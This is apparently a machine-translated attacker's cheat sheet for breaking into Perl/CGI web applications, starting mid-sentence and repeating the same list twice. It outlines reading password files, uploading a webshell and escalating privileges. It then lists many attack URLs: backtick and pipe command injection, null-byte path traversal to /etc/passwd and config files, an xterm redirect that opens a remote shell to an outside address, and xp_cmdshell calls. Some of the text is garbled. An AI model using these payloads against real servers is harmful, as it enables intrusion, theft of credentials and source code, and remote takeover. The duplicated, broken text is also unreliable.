General idea, skip restrictions, view sensitive files and password related files. Write a sentence of cgi, go to the background and try to transfer the webshell (if you add authentication or MD5 in the background, you can try
to deceive cookies and submit it locally), find the executable directory and related functions, and take the shell......" Privilege escalation
Vulnerabilities in perl scripts are mostly in open(), system() or '' calls. The former allows read and write and execution, while the latter two allow execution.
If you send the form by POST, you can't get away with it (%00 will not be parsed), so we mostly use GET
http://target.com/cgi-bin/home/news/sub.pl?12 Construct
http://target.com/cgi-bin/home/news/sub.pl?& change a character, maybe it can be executed
http://target.com/cgi-bin/home/news/sub.pl?` ls` single quote
http://target.com/cgi-bin/home/news/sub.pl?`id`
http://target.com/cgi-bin/home/news/sub.pl?`IFS= !;uname!-a`
http://target.com/cgi-bin/home/news/sub.pl?`cat<'/home1/siteadm/cgi-bin/home/news/sub.pl'` very Good idea, cat the code back to show
http://target.com/test.pl;ls|
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0 +%26|
http://target.com/test.pl?'id' Similar to the operations and commands in '', execute your own construction
. For example: cat<'/home1/siteadm/cgi-bin/home/news/test. pl'` Display the pl code.
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 Sql injection similar to asp
http://target.com/test.pl?&........ /../../etc/passwd
http://www.target.org/cgi-bin/cl ... info.pl?user=./test prefixed with ./
http://www.target.org /cgi-bin/cl ... nfo.pl?user=test%00 Be careful not to lose the %00 behind
http://www.target.org/cgi-bin/cl ... ../.. /etc/passwd%00
http://www.target.org/show.php?f ... /include/config.php View php code
http://www.target.org/show.php?f .. .ng/admin/global.php
A word of emm and ps
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20
>bbb%20|
http://www. target.org/cgi-bin/club/scripts\'less showpost.pl\' and look for (with \'/\') \'Select\' string
http://www.target.org/cgi-bin/ cl ... bin/sh.elf?ls+/http here is elf is the CCS Chinese linux operating system feature
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf ?"+&+ls+/bin
related html suffixed script technology, continue to dig deep, but it is undeniable that submitting data query statements is also a perfect method
http://target.com/index.html#cmd. exe
http://target.com/index.html?dummyparam=xp_cmdshell
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
to deceive cookies and submit it locally), find the executable directory and related functions, and take the shell......" Privilege escalation
Vulnerabilities in perl scripts are mostly in open(), system() or '' calls. The former allows read and write and execution, while the latter two allow execution.
If you send the form by POST, you can't get away with it (%00 will not be parsed), so we mostly use GET
http://target.com/cgi-bin/home/news/sub.pl?12 Construct
http://target.com/cgi-bin/home/news/sub.pl?& change a character, maybe it can be executed
http://target.com/cgi-bin/home/news/sub.pl?` ls` single quote
http://target.com/cgi-bin/home/news/sub.pl?`id`
http://target.com/cgi-bin/home/news/sub.pl?`IFS= !;uname!-a`
http://target.com/cgi-bin/home/news/sub.pl?`cat<'/home1/siteadm/cgi-bin/home/news/sub.pl'` very Good idea, cat the code back to show
http://target.com/test.pl;ls|
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0 +%26|
http://target.com/test.pl?'id' Similar to the operations and commands in '', execute your own construction
. For example: cat<'/home1/siteadm/cgi-bin/home/news/test. pl'` Display the pl code.
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 Sql injection similar to asp
http://target.com/test.pl?&........ /../../etc/passwd
http://www.target.org/cgi-bin/cl ... info.pl?user=./test prefixed with ./
http://www.target.org /cgi-bin/cl ... nfo.pl?user=test%00 Be careful not to lose the %00 behind
http://www.target.org/cgi-bin/cl ... ../.. /etc/passwd%00
http://www.target.org/show.php?f ... /include/config.php View php code
http://www.target.org/show.php?f .. .ng/admin/global.php
A word of emm and ps
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20
>bbb%20|
http://www. target.org/cgi-bin/club/scripts\'less showpost.pl\' and look for (with \'/\') \'Select\' string
http://www.target.org/cgi-bin/ cl ... bin/sh.elf?ls+/http here is elf is the CCS Chinese linux operating system feature
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf ?"+&+ls+/bin
related html suffixed script technology, continue to dig deep, but it is undeniable that submitting data query statements is also a perfect method
http://target.com/index.html#cmd. exe
http://target.com/index.html?dummyparam=xp_cmdshell
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd